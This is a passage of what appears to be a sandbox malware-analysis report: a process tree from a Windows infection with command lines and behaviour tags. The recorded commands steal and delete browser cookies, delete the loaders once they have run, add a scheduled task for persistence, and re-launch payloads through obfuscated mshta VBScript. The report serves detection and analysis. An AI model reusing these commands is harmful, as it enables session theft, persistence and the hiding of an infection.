                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4776
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:676
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:5220
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:5800
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                        7⤵
                                                                          PID:644
                                                                      • C:\Users\Admin\Documents\K0Sz8W3fWyDa6SVBuK9Rpg6g.exe
                                                                        "C:\Users\Admin\Documents\K0Sz8W3fWyDa6SVBuK9Rpg6g.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4940
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5532
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5944
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:6064
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:5552
                                                                          • C:\Users\Admin\Documents\2RwFhixFR3StTemF_jS5Ywry.exe
                                                                            "C:\Users\Admin\Documents\2RwFhixFR3StTemF_jS5Ywry.exe"
                                                                            6⤵
                                                                              PID:3684
                                                                              • C:\Users\Public\run.exe
                                                                                C:\Users\Public\run.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:6080
                                                                                • C:\Users\Public\run.exe
                                                                                  C:\Users\Public\run.exe
                                                                                  8⤵
                                                                                    PID:2636
                                                                                  • C:\Users\Public\run.exe
                                                                                    C:\Users\Public\run.exe
                                                                                    8⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:2488
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                      9⤵
                                                                                        PID:4832
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /T 10 /NOBREAK
                                                                                          10⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5492
                                                                                • C:\Users\Admin\Documents\IoJk4gjboKkbI0VQAI57wI9S.exe
                                                                                  "C:\Users\Admin\Documents\IoJk4gjboKkbI0VQAI57wI9S.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4764
                                                                                  • C:\Users\Admin\Documents\IoJk4gjboKkbI0VQAI57wI9S.exe
                                                                                    "C:\Users\Admin\Documents\IoJk4gjboKkbI0VQAI57wI9S.exe"
                                                                                    7⤵
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:2440
                                                                                • C:\Users\Admin\Documents\zdVqKRSru_RKIz05uVmeHAiC.exe
                                                                                  "C:\Users\Admin\Documents\zdVqKRSru_RKIz05uVmeHAiC.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4792
                                                                                  • C:\Users\Admin\Documents\zdVqKRSru_RKIz05uVmeHAiC.exe
                                                                                    "C:\Users\Admin\Documents\zdVqKRSru_RKIz05uVmeHAiC.exe" -a
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5468
                                                                                • C:\Users\Admin\Documents\48Lz39IYQnLALVMJome6Q4Eh.exe
                                                                                  "C:\Users\Admin\Documents\48Lz39IYQnLALVMJome6Q4Eh.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:4324
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 48Lz39IYQnLALVMJome6Q4Eh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\48Lz39IYQnLALVMJome6Q4Eh.exe" & del C:\ProgramData\*.dll & exit
                                                                                    7⤵
                                                                                      PID:1732
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im 48Lz39IYQnLALVMJome6Q4Eh.exe /f
                                                                                        8⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4924
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2636
                                                                                  • C:\Users\Admin\Documents\2p38sxJko4dOZvy_fuw3mSEV.exe
                                                                                    "C:\Users\Admin\Documents\2p38sxJko4dOZvy_fuw3mSEV.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4132
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 664
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5840
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 672
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4364
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 668
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5304
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 640
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4592
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1128
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:2856
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1084
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:2728
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1164
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:3100
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1208
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4884
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "2p38sxJko4dOZvy_fuw3mSEV.exe" /f & erase "C:\Users\Admin\Documents\2p38sxJko4dOZvy_fuw3mSEV.exe" & exit
                                                                                      7⤵
                                                                                        PID:5832
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im "2p38sxJko4dOZvy_fuw3mSEV.exe" /f
                                                                                          8⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:4956
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3748
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_6.exe
                                                                                    sonia_6.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2264
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      6⤵
                                                                                        PID:2748
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4412
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        6⤵
                                                                                          PID:4436
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                            PID:4592
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                        4⤵
                                                                                          PID:1380
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 432
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2812
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                    1⤵
                                                                                      PID:1880
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                      1⤵
                                                                                        PID:1440
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                        1⤵
                                                                                          PID:1284
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                          1⤵
                                                                                            PID:1244
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                            1⤵
                                                                                              PID:1088
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              PID:296
                                                                                              • C:\ProgramData\Provisioning\settings.exe
                                                                                                C:\ProgramData\Provisioning\settings.exe
                                                                                                2⤵
                                                                                                  PID:5228
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:5884
                                                                                                • C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                  C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5724
                                                                                                • C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                  C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5588
                                                                                                • C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                  C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                  2⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4508
                                                                                                  • C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                    C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                    3⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:2136
                                                                                                • C:\ProgramData\Provisioning\settings.exe
                                                                                                  C:\ProgramData\Provisioning\settings.exe
                                                                                                  2⤵
                                                                                                    PID:2216
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                      3⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:5800
                                                                                                  • C:\ProgramData\Provisioning\settings.exe
                                                                                                    C:\ProgramData\Provisioning\settings.exe
                                                                                                    2⤵
                                                                                                      PID:6096
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                        3⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:1156
                                                                                                    • C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                      C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4824
                                                                                                    • C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                      C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4948
                                                                                                    • C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                      C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:6008
                                                                                                      • C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                        C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                        3⤵
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5824
                                                                                                    • C:\ProgramData\Provisioning\settings.exe
                                                                                                      C:\ProgramData\Provisioning\settings.exe
                                                                                                      2⤵
                                                                                                        PID:3532
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                          3⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:616
                                                                                                      • C:\ProgramData\Provisioning\settings.exe
                                                                                                        C:\ProgramData\Provisioning\settings.exe
                                                                                                        2⤵
                                                                                                          PID:5144
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                            3⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:400
                                                                                                        • C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                          C:\Users\Admin\AppData\Roaming\vgrtufw
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          PID:1956
                                                                                                        • C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                          C:\Users\Admin\AppData\Roaming\udrtufw
                                                                                                          2⤵
                                                                                                            PID:3968
                                                                                                          • C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                            C:\Users\Admin\AppData\Roaming\gwrtufw
                                                                                                            2⤵
                                                                                                              PID:3048
                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                            1⤵
                                                                                                              PID:348
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:656
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Modifies registry class
                                                                                                                PID:3544
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Modifies registry class
                                                                                                                PID:2648
                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:864
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3056
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AFF8.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\AFF8.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4288
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F8D9.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\F8D9.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5780
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F8D9.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\F8D9.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5072
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              1⤵
                                                                                                                PID:5388
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2748
                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  2⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4368
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                1⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                PID:4440
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D659.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\D659.exe
                                                                                                                1⤵
                                                                                                                  PID:5284
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DEF5.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DEF5.exe
                                                                                                                  1⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:2120
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im DEF5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DEF5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:1272
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im DEF5.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3196
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5256
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EFEE.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\EFEE.exe
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4996
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F195.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F195.exe
                                                                                                                    1⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:5056
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FE48.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FE48.exe
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:5504
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\388.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\388.exe
                                                                                                                    1⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5212
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\83D.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\83D.exe
                                                                                                                    1⤵
                                                                                                                      PID:5088
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1108.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1108.exe
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:3544
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                      1⤵
                                                                                                                        PID:4588
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4760
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:5300
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:3364
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:3736
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2632
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4180
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4692
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4656
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:3796
                                                                                                                                      • C:\Windows\System32\slui.exe
                                                                                                                                        C:\Windows\System32\slui.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5284
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7F72.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7F72.exe
                                                                                                                                        1⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:4216
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 7F72.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7F72.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          2⤵
                                                                                                                                            PID:5848
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im 7F72.exe /f
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6052
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              3⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:5968
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8177.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8177.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:1104
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\8177.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\8177.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                              2⤵
                                                                                                                                                PID:4396
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\8177.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\8177.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1080
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                      sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5660
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4352
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                              6⤵
                                                                                                                                                                PID:2464
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
